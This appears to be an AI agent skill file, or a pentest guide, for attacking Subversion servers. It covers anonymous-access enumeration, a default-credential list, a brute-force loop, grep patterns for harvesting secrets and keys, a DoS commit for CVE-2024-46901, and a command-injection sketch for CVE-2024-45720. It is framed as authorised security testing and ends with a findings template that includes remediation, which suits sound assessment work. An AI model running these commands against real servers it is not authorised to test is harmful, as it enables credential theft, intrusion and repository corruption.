SVN Server Pentesting

This skill helps you assess Subversion (SVN) servers for security vulnerabilities, misconfigurations, and exposed secrets.

When to Use This Skill

• Port 3690/tcp is open (svnserve)
• You find

  svn://

  ,

  svn+ssh://

  , or

  http(s)://.../svn/

  URLs
• You discover mod_dav_svn serving repositories over HTTP/HTTPS
• You need to enumerate version control systems for secrets, credentials, or misconfigurations
• You're assessing Subversion versions for known CVEs

Quick Start

# Check if SVN is running
nc -vn <target> 3690

# Try anonymous access
svn ls svn://<target>
svn ls -R svn://<target>/repo

# If over HTTP(S)
svn ls https://<target>/svn/repo --username guest --password ''

Enumeration Workflow

1. Identify Access Method

Determine how the SVN server is exposed:

svn://<host>

http(s)://<host>/svn/

svn+ssh://<host>

2. Banner Grabbing

# Connect to port 3690
nc -vn <target> 3690

# Check client version (may leak via errors)
svn --version

# If you have shell access
svnserve --version

3. Anonymous Access Testing

Try to list and checkout without credentials:

# List root directory
svn ls svn://<target>

# Recursive listing
svn ls -R svn://<target>/repo

# Get repository metadata
svn info svn://<target>/repo

# View commit history
svn log svn://<target>/repo

# Full checkout (may expose secrets)
svn checkout svn://<target>/repo

4. Extract Revision Properties

Revision properties often contain build credentials, URLs, and tokens:

# Get commit messages (may contain sensitive info)
svn propget --revprop -r HEAD svn:log svn://<target>/repo

# Get all revision properties
svn propget --revprop -r HEAD svn:author svn://<target>/repo
svn propget --revprop -r HEAD svn:date svn://<target>/repo

5. Check for svn:externals

After checkout, check for external dependencies that may point to other hosts:

svn propget svn:externals -R .

Authentication Testing

Common Credentials to Try

• admin:admin

  ,

  admin:password

  ,

  admin:123456

• svn:svn

  ,

  user:user

  ,

  guest:guest

• ci:ci

  ,

  dev:dev

  ,

  build:build

• Reuse credentials found elsewhere in the engagement

Brute-Force Script

Use the bundled script for credential spraying:

./scripts/bruteforce_svn.sh <target> <repo> <userlist> <passlist>

Or manually:

for u in admin dev ci; do
  for p in $(cat /tmp/passlist); do
    svn ls --username "$u" --password "$p" svn://<target>/repo 2>/dev/null && echo "[+] $u:$p" && break
  done
done

Secret Extraction

After successful checkout, search for sensitive data:

# Search for credentials
grep -R "password\|secret\|token\|api_key\|aws_access" -n .

# Search for private keys
grep -R "BEGIN.*PRIVATE" -n .

# Search for database configs
grep -R "mysql://\|postgres://\|mongodb://" -n .

# Check common secret locations
find . -name "*.env" -o -name "*.config" -o -name "*.conf" -o -name "credentials*"

CVE Exploitation

CVE-2024-46901: mod_dav_svn DoS via Control Characters

Affects: Subversion ≤ 1.14.4 when served through HTTP(S) (mod_dav_svn)

Impact: Repository corruption, service crash

Prerequisites: Valid commit credentials

Exploitation:

# Create payload
printf 'pwn' > /tmp/payload

# Commit path with control character (requires commit access)
svnmucc -m "DoS" put /tmp/payload $'http://<target>/svn/repo/trunk/bad\x01path.txt'

Detection: Check Apache response headers for Subversion version:

curl -I https://<target>/svn/repo | grep -i subversion

CVE-2024-45720: Windows Argument Injection

Affects: Subversion ≤ 1.14.3 on Windows only

Impact: Arbitrary command execution via crafted paths

Attack Vector: Social engineering - trick Windows developer to run

svn

Example:

# Create malicious path with best-fit encoding bytes
# Path decodes to: " & calc.exe & " style injection
# Requires victim to run: svn status <malicious-path>

Note: This requires victim interaction - not directly exploitable remotely.

Advanced Techniques

Hook Script Analysis

If you obtain filesystem access to the repository:

# Check for hook scripts
ls -la hooks/

# Analyze pre-commit/post-commit hooks
cat hooks/pre-commit
cat hooks/post-commit

# Hooks may contain plaintext credentials or hostnames

Offline Repository Analysis

With filesystem access to

.svn

# Dump repository contents
svnadmin dump /path/to/repo

# View authors
svnlook author /path/to/repo

# View changed directories
svnlook dirs-changed /path/to/repo

# View file contents at specific revision
svnlook file -r <revision> /path/to/repo/path/to/file

Version Leaks

HTTP response headers often reveal Subversion and Apache versions:

curl -I https://<target>/svn/repo
# Look for: DAV: 1/1, 2/1, SVN version headers

Compare against 1.14.5 to identify vulnerable targets.

Common Misconfigurations

1. Anonymous read access:

   anon-access = read

   in

   svnserve.conf

2. Anonymous write access:

   anon-access = write

   (critical)
3. Weak authentication: Simple password files without lockout
4. Exposed hooks: Pre-commit/post-commit scripts with credentials
5. Unrestricted svn+ssh: User shells allowing restricted svnserve commands

Output Format

When documenting findings, use this structure:

## SVN Assessment Results

### Target
- Host: <target>
- Port: 3690/tcp
- Access Method: svnserve/mod_dav_svn/svn+ssh

### Version
- Subversion: <version>
- Vulnerable to CVEs: <list or "None identified">

### Access Status
- Anonymous: <allowed/denied>
- Authenticated: <credentials found or "Not tested">

### Secrets Found
- <list of sensitive files/credentials discovered>

### Recommendations
- <remediation steps>

References

• Apache Subversion CVE-2024-46901 Advisory
• Apache Subversion CVE-2024-45720 Advisory
• Subversion Documentation

Scripts

This skill includes helper scripts:

• scripts/enumerate_svn.sh

  - Automated enumeration of SVN repositories

• scripts/bruteforce_svn.sh

  - Credential brute-forcing against SVN servers

• scripts/check_svn_version.sh

  - Version detection and CVE matching

Run with

--help